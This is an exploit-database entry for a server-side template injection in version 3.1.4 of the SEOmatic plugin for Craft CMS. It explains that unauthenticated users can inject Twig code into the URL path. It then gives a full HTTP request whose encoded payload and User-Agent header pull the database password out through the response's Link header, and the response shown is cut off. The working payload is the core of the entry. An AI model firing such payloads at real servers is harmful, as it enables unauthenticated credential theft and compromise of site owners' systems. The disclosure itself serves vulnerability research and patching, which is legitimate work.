Exploits / Vulnerability Discovered : 2018-07-31 |
Type : webapps |
Platform : linux
This exploit / vulnerability Craft cms seomatic plugin 3.1.4 serverside template injection is for educational purposes only and if it is used you will do on your own risk!
# 1. Description
# An unauthenticated user can trigger the Twig template engine by injecting
# code into the URI as described in this article:
# http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic/
# This can be leveraged to perform arbitrary calls against the template engine and the CMS.
# The output will be reflected within the Link header of the response.
# 2. Proof of Concept
# The injection can be performed against any part of the URL path. However as the framework is replacing
# control characters with HTML entities (e.g. ' ==> ') it is not possible to directly address methods with
# parameter values. Therefor it is required to bypass the filter by invoking functions such as craft.request.getUserAgent()
# and store the parameter values in the User-Agent header. In combination with Twig's slice() filter it is then possible
# to extract sensitive information by utilizing the craft.config.get() method:
# Request:
HEAD /db-password:%20%7b%25%20set%20dummy%20=%20craft.request.getUserAgent()|slice(0,8)%25%7d%7b%25%20set%20dummy2%20=%20craft.request.getUserAgent()|slice(9,2)%25%7d%7b%7bcraft.config.get(dummy,dummy2)%7d%7d HTTP/1.1
Host: craft-installation
User-Agent: password db
# Response:
HTTP/1.1 404 Not Found
Server: nginx
…